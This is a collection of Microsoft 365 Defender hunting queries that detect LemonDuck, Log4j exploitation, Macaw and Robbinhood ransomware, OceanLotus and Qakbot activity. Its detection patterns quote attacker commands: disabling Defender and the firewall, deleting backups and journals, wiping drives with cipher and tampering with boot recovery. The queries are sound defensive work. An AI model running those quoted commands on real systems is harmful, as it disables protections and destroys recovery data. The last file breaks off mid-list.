| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/LemonDuck/LemonDuck-id-generation.md
================================================
# LemonDuck command-and-control ID generation
LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavior and escalated its operations in 2021. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.
## Query
This query checks for the current method of exfiltrating basic component information to LemonDuck command and control servers. In previous iterations other methods were used and currently this logic is included at the end of callout to the server to identify the client.
```
DeviceNetworkEvents
| where InitiatingProcessFileName =~ "powershell.exe"
| where InitiatingProcessCommandLine endswith "(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))"
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | v | |
| Collection | | |
| Command and control | v | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/LemonDuck/LemonDuck-registration-function.md
================================================
# LemonDuck botnet registration functions
LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavior and escalated its operations in 2021. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.
## Query
This query looks for instances of function runs with name “SIEX”, which within the Lemon Duck initializing scripts is used to assign a specific user-agent for reporting back to command-and-control infrastructure with. This query should be accompanied by additional surrounding logs showing successful downloads from component sites.
```
DeviceEvents
| where ActionType == "PowerShellCommand"
| where AdditionalFields =~ "{\"Command\":\"SIEX\"}"
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | v | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | v | |
| Collection | | |
| Command and control | v | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Log4J/Alerts related to Log4j vulnerability.md
================================================
# Alerts related to Log4j vulnerability
Microsoft has observed attackers exploiting vulnerabilities associated with Log4J.
## Query
This query looks for alerts related to the Log4J vulnerability. Devices with these alerts should be investigated for potential malicious activity.
```
AlertInfo
| where Title in~('Suspicious script launched',
'Exploitation attempt against Log4j (CVE-2021-44228)',
'Suspicious process executed by a network service',
'Possible target of Log4j exploitation (CVE-2021-44228)',
'Possible target of Log4j exploitation',
'Possible Log4j exploitation',
'Network connection seen in CVE-2021-44228 exploitation',
'Log4j exploitation detected',
'Possible exploitation of CVE-2021-44228',
'Possible target of Log4j vulnerability (CVE-2021-44228) scanning',
'Possible source of Log4j exploitation',
'Log4j exploitation attempt via cloud application', // Previously titled Exploitation attempt against Log4j
'Log4j exploitation attempt via email' // Previously titled Log4j Exploitation Attempt
)
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | v | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Log4J/Devices with Log4j vulnerability alerts and additional other alert related context.md
================================================
# Devices with Log4j vulnerability alerts and additional other alert related context
Microsoft has observed threat actors exploiting vulnerabilities associated with Log4J.
## Query
This query looks for devices that have alerts for suspected Log4J vulnerability explotation, and identifies other alerts that have been observed on the device within a given timeframe.
```
// Get any devices with Log4J related Alert Activity
let DevicesLog4JAlerts = AlertInfo
| where Title in~('Suspicious script launched',
'Exploitation attempt against Log4j (CVE-2021-44228)',
'Suspicious process executed by a network service',
'Possible target of Log4j exploitation (CVE-2021-44228)',
'Possible target of Log4j exploitation',
'Possible Log4j exploitation',
'Network connection seen in CVE-2021-44228 exploitation',
'Log4j exploitation detected',
'Possible exploitation of CVE-2021-44228',
'Possible target of Log4j vulnerability (CVE-2021-44228) scanning',
'Possible source of Log4j exploitation'
'Log4j exploitation attempt via cloud application', // Previously titled Exploitation attempt against Log4j
'Log4j exploitation attempt via email' // Previously titled Log4j Exploitation Attempt
)
// Join in evidence information
| join AlertEvidence on AlertId
| where DeviceId != ""
| summarize by DeviceId, Title;
// Get additional alert activity for each device
AlertEvidence
| where DeviceId in(DevicesLog4JAlerts)
// Add additional info
| join kind=leftouter AlertInfo on AlertId
| summarize DeviceAlerts = make_set(Title), AlertIDs = make_set(AlertId) by DeviceId, bin(Timestamp, 1d)
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | v | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Log4J/Suspicious JScript staging comment.md
================================================
# Suspicious JScript staging comment
Microsoft has observed attackers who have gained entry to an environment via the Log4J vulnerability utilizing identifiable strings in PowerShell commands.
## Query
This query identifies a unique string present in malicious PowerShell commands attributed to threat actors exploiting vulnerable Log4j applications. These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application.
```
DeviceProcessEvents
| where FileName =~ "powershell.exe"
| where ProcessCommandLine has "VMBlastSG"
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | v | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Log4J/Suspicious PowerShell curl flags.md
================================================
# Suspicious PowerShell curl flags
Microsoft has observed attackers who have gained entry to an environment via the Log4J vulnerability utilizing uncommon PowerShell flags to communicate to command-and-control infrastructure.
## Query
This query identifies unique, uncommon PowerShell flags used by curl to post the results of an attacker-executed command back to the command-and-control infrastructure. If the event is a true positive, the contents of the “Body” argument are Base64-encoded results from an attacker-issued comment. These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application.
```
DeviceProcessEvents
| where FileName =~ "powershell.exe"
| where ProcessCommandLine has_all("-met", "POST", "-Body")
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | v | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Log4J/Suspicious process event creation from VMWare Horizon TomcatService.md
================================================
# Suspicious process event creation from VMWare Horizon TomcatService
Microsoft has observed attackers who have gained entry to an environment via the Log4J vulnerability utilizing the ws_TomcatService.exe process to launch malicious processes.
## Query
This query identifies anomalous child processes from the ws_TomcatService.exe process associated with the exploitation of the Log4j vulnerability in VMWare Horizon installations. These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application.
```
DeviceProcessEvents
| where InitiatingProcessFileName has "ws_TomcatService.exe"
| where FileName != "repadmin.exe"
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | v | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/MacOceanLotusBackdoor.txt
================================================
// Backdoor processes associated with OceanLotus Mac Malware Backdoor
// References:
// https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/
//
// OS platforms: Macintosh
DeviceProcessEvents
| where Timestamp > ago(14d)
| where FileName in~ ("screenassistantd","spellagentd")
| top 100 by Timestamp
================================================
FILE: Campaigns/MacOceanLotusDropper.txt
================================================
// Backdoor processes associated with OceanLotus Mac malware backdoor dropper
// References:
// https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/
// OS Platforms: Macintosh
DeviceProcessEvents
| where Timestamp > ago(14d)
| where ProcessCommandLine contains "theme0"
| project Timestamp, DeviceId , DeviceName, AccountName , AccountSid , InitiatingProcessCommandLine , ProcessCommandLine
| top 100 by Timestamp
================================================
FILE: Campaigns/Macaw Ransomware/Disable Controlled Folders.md
================================================
# Macaw ransomware - Disable Controlled Folders
Prior to deploying Macaw ransomware in an organization, the adversary will disable all controlled folders, which will enable them to be encrypted once the ransomware payload is deployed.
## Query
This query looks for instances where the attacker has disabled the use of controlled folders.
```
DeviceProcessEvents
| where InitiatingProcessFileName =~ 'cmd.exe'
| where FileName =~ 'powershell.exe' and ProcessCommandLine has('powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"')
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | v | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Macaw Ransomware/Imminent Ransomware.md
================================================
# Macaw ransomware - Imminent Ransomware
Directly prior to deploying Macaw ransomware in an organization, the attacker will run several commands designed to disable security tools and system recovery tools.
## Query
This query looks for instances where the attacker has run a collection of commands designed to tamper with security tools and system recovery tools.
```
DeviceProcessEvents
// Pivot on specific commands
| where ProcessCommandLine has_any("-ExclusionPath", "Set-MpPreference", "advfirewall", "-ExclusionExtension",
"-EnableControlledFolderAccess", "windefend", "onstart", "bcdedit", "Startup")
// Making list of found commands
| summarize ProcessCommandLine = make_set(ProcessCommandLine) by DeviceId, bin(Timestamp, 6h)
// Extending columns for later aggregration, based on TTP
| extend StartUpExclusionPath = iff(ProcessCommandLine has_all("-ExclusionPath", "Startup"), 1, 0)
| extend DefenderTamp = iff(ProcessCommandLine has "Set-MpPreference"
and ProcessCommandLine has_any(
"-SevereThreatDefaultAction 6"
"-HighThreatDefaultAction 6",
"-ModerateThreatDefaultAction 6",
"-LowThreatDefaultAction 6"
"-ScanScheduleDay 8"), 1, 0)
| extend NetshFirewallTampering = iff(ProcessCommandLine has_all( "netsh", "advfirewall", "allprofiles state off"), 1, 0)
| extend BatExclusion = iff(ProcessCommandLine has_all("-ExclusionExtension", ".bat"), 1, 0)
| extend ExeExclusion = iff(ProcessCommandLine has_all("-ExclusionExtension", ".exe"), 1, 0)
| extend DisableControlledFolderAccess = iff(ProcessCommandLine has_all("-EnableControlledFolderAccess", "Disabled"), 1, 0)
| extend ScDeleteDefend = iff(ProcessCommandLine has_all("sc", "delete", "windefend"), 1, 0)
| extend BootTampering = iff(ProcessCommandLine has_all("bcdedit", "default") and ProcessCommandLine has_any ("recoveryenabled No", "bootstatuspolicy ignoreallfailures"), 1, 0)
| extend SchTasks = iff(ProcessCommandLine has_all("/sc", "onstart", "system", "/create", "/delay"), 1, 0)
// Summarizing found commands
| summarize by NetshFirewallTampering ,BatExclusion, ExeExclusion, DisableControlledFolderAccess, ScDeleteDefend, SchTasks, BootTampering, DefenderTamp, StartUpExclusionPath, DeviceId, Timestamp
// Adding up each piece of evidence
| extend EvidenceCount = NetshFirewallTampering + BatExclusion + ExeExclusion + DisableControlledFolderAccess + ScDeleteDefend + SchTasks + BootTampering + DefenderTamp + StartUpExclusionPath
| where EvidenceCount > 4
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | v | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Macaw Ransomware/Inhibit recovery by disabling tools and functionality.md
================================================
# Macaw ransomware - Inhibit recovery by disabling tools and functionality
Prior to deploying Macaw ransomware in an organization, the adversary will disable several tools and functions in order to inhibit later recovery efforts.
## Query
This query looks for instances where the attacker has disabled various tools including Task Manager, CMD, and Registry Tools.
```
DeviceProcessEvents
| where ProcessCommandLine has_all ("reg", "add")
| where ProcessCommandLine has_any("DisableTaskMgr", "DisableCMD", "DisableRegistryTools", "NoRun") and ProcessCommandLine has "REG_DWORD /d \"1\""
| summarize ProcessCount = dcount(ProcessCommandLine), make_set(ProcessCommandLine) by InitiatingProcessCommandLine, DeviceId, bin(Timestamp, 3m)
| where ProcessCount > 2
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | v | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Macaw Ransomware/Mass account password change.md
================================================
# Macaw ransomware - Mass account password change
Prior to deploying Macaw ransomware in an organization, adversaries will change the password for hundreds or thousands of accounts in order to lock users out of the network and impeded recovery efforts.
## Query
This query looks for instances of attackers changes hundreds of account passwords within short succession.
```
DeviceProcessEvents
| where ProcessCommandLine has_all('user', '/Domain', '/Active:Yes', '/PasswordChg:No')
| summarize commands=count() by DeviceId, bin(Timestamp, 1d)
| where commands > 200
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | v | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Macaw Ransomware/PSExec Attrib commands.md
================================================
# Macaw ransomware - PSExec Attrib commands
Prior to deploying Macaw ransomware in an organization, adversaries wil use Attrib to display file attribute information on multiple drives and all subfolders.
## Query
This query looks for PSExec utilizing a .bat file to run the attrib command with parameters observed in Macaw incidents.
```
DeviceProcessEvents
| where InitiatingProcessParentFileName endswith "PSEXESVC.exe"
| where InitiatingProcessCommandLine has ".bat"
| where FileName =~ "cmd.exe" and ProcessCommandLine has_all("-s", "-h", "-r", "-a", "*.*")
| take 100
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | v | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | v | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Macaw Ransomware/Use of MSBuild as LOLBin.md
================================================
# Macaw Ransomware - Use of MSBuild.exe as a LOLBin
Prior to deploying Macaw ransomware in an organization, the adversary frequently uses MSBuild.exe as a LOLBin to communicate with the C2.
## Query
This query looks for instances of MSBuild.exe being used as a LOLBin.
```
DeviceProcessEvents
| where InitiatingProcessFileName =~ "wmiprvse.exe"
| where FileName =~ "msbuild.exe" and ProcessCommandLine has "programdata"
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | v | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/OceanLotus registry activity.txt
================================================
// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_oceanlotus_registry.yml
// Questions via Twitter: @janvonkirchheim
DeviceRegistryEvents
| where Timestamp > ago(7d)
| where ActionType == "RegistryValueSet"
| where RegistryKey endswith @"\SOFTWARE\Classes\CLSID\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\Model"
or RegistryKey endswith @"\SOFTWARE\App\AppXbf13d4ea2945444d8b13e2121cb6b663\Application"
or RegistryKey endswith @"\SOFTWARE\App\AppXbf13d4ea2945444d8b13e2121cb6b663\DefaultIcon"
or RegistryKey endswith @"\SOFTWARE\App\AppX70162486c7554f7f80f481985d67586d\Application"
or RegistryKey endswith @"\SOFTWARE\App\AppX70162486c7554f7f80f481985d67586d\DefaultIcon"
or RegistryKey endswith @"\SOFTWARE\App\AppX37cc7fdccd644b4f85f4b22d5a3f105a\Application"
or RegistryKey endswith @"\SOFTWARE\App\AppX37cc7fdccd644b4f85f4b22d5a3f105a\DefaultIcon"
================================================
FILE: Campaigns/Qakbot/Excel launching anomalous processes.md
================================================
# Excel launching anomalous processes
## Query
Use this query to find Excel launching anomalous processes congruent with Qakbot payloads which contain additional markers from recent Qakbot executions. The presence of such anomalous processes indicate that the payload was delivered and executed, though reconnaissance and successful implantation hasn’t been completed yet.
```
DeviceProcessEvents
| where InitiatingProcessParentFileName has "excel.exe" or InitiatingProcessFileName =~ "excel.exe"
| where InitiatingProcessFileName in~ ("excel.exe","regsvr32.exe")
| where FileName in~ ("regsvr32.exe", "rundll32.exe")| where ProcessCommandLine has @"..\"
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Qakbot/General attempts to access local email store.md
================================================
# General attempts to access local email store
## Query
Use this query to find attempts to access files in the local path containing Outlook emails.
```
DeviceFileEvents
| where FolderPath hasprefix "EmailStorage"
| where FolderPath has "Outlook"
| project FileName, FolderPath, InitiatingProcessFileName,
InitiatingProcessCommandLine, DeviceId, Timestamp
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | v | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Qakbot/Qakbot Craigslist Domains.md
================================================
# Qakbot Craigslist Domains
Qakbot operators have been abusing the Craigslist messaging system to send malicious emails. These emails contain non-clickable links to malicious domains impersonating Craigslist, which the user is instructed to manually type into the address bar to access.
## Query
This query looks for network connections to domains impersonating Craigslist which are associated with the delivery of Qakbot.
```
DeviceNetworkEvents
| where RemoteUrl matches regex @"abuse\.[a-zA-Z]\d{2}-craigslist\.org"
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | v | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Qakbot/Qakbot email theft.md
================================================
# Qakbot email theft
## Query
Use this query to find email stealing activities ran by Qakbot that will use “ping.exe -t 127.0.0.1” to obfuscate subsequent actions. Email theft that occurs might be exfiltrated to operators and indicates that the malware completed a large portion of its automated activity without interruption.
Generic:
```
DeviceFileEvents
| where InitiatingProcessFileName =~ 'ping.exe'
| where FileName endswith '.eml'
```
Specific:
```
DeviceFileEvents
| where InitiatingProcessFileName =~ 'ping.exe' and InitiatingProcessCommandLine == 'ping.exe -t 127.0.0.1'
and InitiatingProcessParentFileName in~('msra.exe', 'mobsync.exe') and FolderPath endswith ".eml"
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | v | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Qakbot/Qakbot reconnaissance activities.md
================================================
# Qakbot reconnaissance activities
## Query
Use this query to find reconnaissance and beaconing activities after code injection occurs. Reconnaissance commands are consistent with the current version of Qakbot and occur automatically to exfiltrate system information. This data, once exfiltrated, will be used to prioritize human operated actions.
```
DeviceProcessEvents
| where InitiatingProcessFileName == InitiatingProcessCommandLine
| where ProcessCommandLine has_any (
"whoami /all","cmd /c set","arp -a","ipconfig /all","net view /all","nslookup -querytype=ALL -timeout=10",
"net share","route print","netstat -nao","net localgroup")
| summarize dcount(FileName), make_set(ProcessCommandLine) by DeviceId,bin(Timestamp, 1d), InitiatingProcessFileName, InitiatingProcessCommandLine
| where dcount_FileName >= 8
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | v | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Ransomware hits healthcare - Alternate Data Streams use.txt
================================================
// Find use of Alternate Data Streams (ADS) for anti-forensic purposes.
// Alternate Data Streams execution
DeviceProcessEvents
| where Timestamp > ago(7d)
// Command lines used
| where ProcessCommandLine startswith "-q -s" and ProcessCommandLine has "-p"
// Removing IDE processes
and not(FolderPath has_any("visual studio", "ide"))
| summarize make_set(ProcessCommandLine), make_set(FolderPath),
make_set(InitiatingProcessCommandLine) by DeviceId, bin(Timestamp, 1h)
================================================
FILE: Campaigns/Ransomware hits healthcare - Backup deletion.txt
================================================
// List alerts flagging attempts to delete backup files
AlertInfo
| where Timestamp > ago(7d)
| where Title == "File backups were deleted"
| join AlertEvidence on AlertId
================================================
FILE: Campaigns/Ransomware hits healthcare - Cipher.exe tool deleting data.txt
================================================
// Look for cipher.exe deleting data from multiple drives.
// This is often performed as an anti-forensic measure prior to encryption.
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName =~ "cipher.exe"
// Looking for /w flag for deleting
| where ProcessCommandLine has "/w"
| summarize CommandCount = dcount(ProcessCommandLine),
make_set(ProcessCommandLine) by DeviceId, bin(Timestamp, 1m)
// Looking for multiple drives in a short timeframe
| where CommandCount > 1
================================================
FILE: Campaigns/Ransomware hits healthcare - Clearing of system logs.txt
================================================
// Look for attempts to use fsutil.exe to delete file system logs that can be used as forensic artifacts.
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName =~ "fsutil.exe"
and ProcessCommandLine has "usn" and ProcessCommandLine has "deletejournal"
================================================
FILE: Campaigns/Ransomware hits healthcare - Possible compromised accounts.txt
================================================
// Identify accounts that have logged on to affected endpoints
// Check for specific alerts
AlertInfo
| where Timestamp > ago(7d)
// Attempts to clear security event logs.
| where Title in("Event log was cleared",
// List alerts flagging attempts to delete backup files.
"File backups were deleted",
// Potential Cobalt Strike activity - Note that other threat activity can also
// trigger alerts for suspicious decoded content
"Suspicious decoded content",
// Cobalt Strike activity
"'Atosev' malware was detected",
"'Ploty' malware was detected",
"'Bynoco' malware was detected")
| extend AlertTime = Timestamp
| join AlertEvidence on AlertId
| distinct DeviceName, AlertTime, AlertId, Title
| join DeviceLogonEvents on DeviceName
// Creating 10 day Window surrounding alert activity
| where Timestamp < AlertTime +5d and Timestamp > AlertTime - 5d
// Projecting specific columns
| project Title, DeviceName, DeviceId, Timestamp, LogonType, AccountDomain,
AccountName, AccountSid, AlertTime, AlertId, RemoteIP, RemoteDeviceName
================================================
FILE: Campaigns/Ransomware hits healthcare - Robbinhood activity.txt
================================================
// Find distinct evasion and execution activities
// associated with the Robbinhood ransomware campaign.
DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName =~ "winlogon.exe"
| where FileName == "cmd.exe" and ProcessCommandLine has_any("taskkill", "net",
"robbin", "vssadmin", "bcdedit", "wevtutil")
================================================
FILE: Campaigns/Ransomware hits healthcare - Turning off System Restore.txt
================================================
// Find attempts to stop System Restore and
// prevent the system from creating restore points
DeviceProcessEvents
| where Timestamp > ago(7d)
// Pivoting for rundll32
and InitiatingProcessFileName =~ 'rundll32.exe'
// Looking for empty command line
and isnotempty(InitiatingProcessCommandLine)
// Looking for schtasks.exe as the created process
and FileName in~ ('schtasks.exe')
// Disabling system restore
and ProcessCommandLine has 'Change' and ProcessCommandLine has 'SystemRestore'
and ProcessCommandLine has 'disable'
================================================
FILE: Campaigns/Ransomware hits healthcare - Vulnerable Gigabyte drivers.txt
================================================
// Locate vulnerable Gigabyte drivers used by RobbinHood ransomware to turn off security tools
DeviceFileEvents
| where Timestamp > ago(7d)
| where SHA1 in('0b15b5cc64caf0c6ad9bd759eb35383b1f718edf3d7ab4cd912d0d8c1826edf8',
